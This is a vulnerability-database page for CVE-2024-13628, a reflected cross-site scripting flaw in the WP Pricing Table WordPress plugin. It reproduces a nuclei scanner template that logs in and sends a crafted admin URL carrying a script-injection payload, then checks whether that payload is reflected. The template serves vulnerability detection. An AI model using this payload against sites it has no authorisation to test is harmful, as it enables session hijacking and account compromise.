Lucene search
K

WP Pricing Table - Reflected XSS

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

WP Pricing Table plugin version <=1.1 has a reflected cross site scripting vulnerability via unsanitized output and a crafted URL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13628
26 Feb 202506:25
circl
CNNVD
WordPress plugin WP Pricing Table 安全漏洞
26 Feb 202500:00
cnnvd
CVE
CVE-2024-13628
26 Feb 202506:00
cve
Cvelist
CVE-2024-13628 WP Pricing Table <= 1.1 - Reflected XSS
26 Feb 202506:00
cvelist
EUVD
EUVD-2024-53909
3 Oct 202520:07
euvd
NVD
CVE-2024-13628
26 Feb 202513:15
nvd
OSV
CVE-2024-13628
26 Feb 202513:15
osv
Patchstack
WordPress WP Pricing Table plugin <= 1.1 - Reflected Cross-Site Scripting vulnerability
12 Feb 202521:51
patchstack
Positive Technologies
PT-2025-8675
26 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13628
28 Feb 202506:24
redhatcve
Rows per page
id: CVE-2024-13628

info:
  name: WP Pricing Table - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Pricing Table WordPress plugin <= 1.1 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of WP Pricing Table plugin that addresses the vulnerability or apply security patches.
  reference:
    - https://wpscan.com/vulnerability/34d6c8a2-e70d-485c-a217-4a569c16b079/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13628
    cwe-id: CWE-79
    epss-score: 0.00641
    epss-percentile: 0.46314
    cpe: cpe:2.3:a:codecabin:wp_pricing_table:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/wp-pricing-table/"
  tags: cve,cve2024,codecabin,wp-pricing-table,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp-pricing-table-menu&action=new&table_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","wp-pricing-table")
        condition: and
# digest: 4a0a0047304502203a8dd0d982e916067f72db0018b9f36d924ccabb64662ca3c817763e5263c2e4022100f765ea03f792fa4124f6e8245fb9d462da67fea6a0ba7344a225b74b695ffd1c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:41Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00641
SSVC
10